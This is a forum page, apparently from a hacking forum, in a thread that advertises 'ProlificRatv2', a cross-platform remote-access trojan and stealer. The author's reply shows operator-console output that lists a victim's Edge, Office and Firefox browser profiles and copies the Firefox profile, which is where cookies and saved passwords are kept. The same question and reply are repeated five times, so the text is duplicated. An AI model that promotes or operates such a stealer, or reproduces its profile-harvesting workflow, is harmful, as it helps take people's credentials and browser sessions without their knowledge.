What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

ProlificRatv2 // crossplatform agent + stealer

RAZOR-X сказал(а):
hvnc based on which code? all browser's configuration/cookies/paswords are copied ?
Нажмите, чтобы раскрыть...
it's my own implementation not a fork. There is a command to copy directory, Here is an example:

Код: Скопировать в буфер обмена
Code:
Task:2 Status:completed >> lsprofiles user
[+] searching for profiles belonging to: C:\Users\user
[+] found 3 browser directories
--------------------------------------------------
[+] profile parent: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Roaming\Mozilla\Firefox
[+] browser type: gecko
[+] profile paths:
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release
--------------------------------------------------

Task:3 Status:completed >> cpdir C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release-bak
 
RAZOR-X сказал(а):
hvnc based on which code? all browser's configuration/cookies/paswords are copied ?
Нажмите, чтобы раскрыть...
it's my own implementation not a fork. There is a command to copy directory, Here is an example:

Код: Скопировать в буфер обмена
Code:
Task:2 Status:completed >> lsprofiles user
[+] searching for profiles belonging to: C:\Users\user
[+] found 3 browser directories
--------------------------------------------------
[+] profile parent: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Roaming\Mozilla\Firefox
[+] browser type: gecko
[+] profile paths:
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release
--------------------------------------------------

Task:3 Status:completed >> cpdir C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release-bak
 
RAZOR-X сказал(а):
hvnc based on which code? all browser's configuration/cookies/paswords are copied ?
Нажмите, чтобы раскрыть...
it's my own implementation not a fork. There is a command to copy directory, Here is an example:

Код: Скопировать в буфер обмена
Code:
Task:2 Status:completed >> lsprofiles user
[+] searching for profiles belonging to: C:\Users\user
[+] found 3 browser directories
--------------------------------------------------
[+] profile parent: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Roaming\Mozilla\Firefox
[+] browser type: gecko
[+] profile paths:
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release
--------------------------------------------------

Task:3 Status:completed >> cpdir C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release-bak
 
RAZOR-X сказал(а):
hvnc based on which code? all browser's configuration/cookies/paswords are copied ?
Нажмите, чтобы раскрыть...
it's my own implementation not a fork. There is a command to copy directory, Here is an example:

Код: Скопировать в буфер обмена
Code:
Task:2 Status:completed >> lsprofiles user
[+] searching for profiles belonging to: C:\Users\user
[+] found 3 browser directories
--------------------------------------------------
[+] profile parent: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Roaming\Mozilla\Firefox
[+] browser type: gecko
[+] profile paths:
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release
--------------------------------------------------

Task:3 Status:completed >> cpdir C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release-bak
 
RAZOR-X сказал(а):
hvnc based on which code? all browser's configuration/cookies/paswords are copied ?
Нажмите, чтобы раскрыть...
it's my own implementation not a fork. There is a command to copy directory, Here is an example:

Код: Скопировать в буфер обмена
Code:
Task:2 Status:completed >> lsprofiles user
[+] searching for profiles belonging to: C:\Users\user
[+] found 3 browser directories
--------------------------------------------------
[+] profile parent: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView
[+] browser type: chromium
[+] profile paths:
C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\EBWebView\Default
--------------------------------------------------

[+] profile parent: C:\Users\user\AppData\Roaming\Mozilla\Firefox
[+] browser type: gecko
[+] profile paths:
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release
--------------------------------------------------

Task:3 Status:completed >> cpdir C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ttrvedso.default-release-bak
 
Top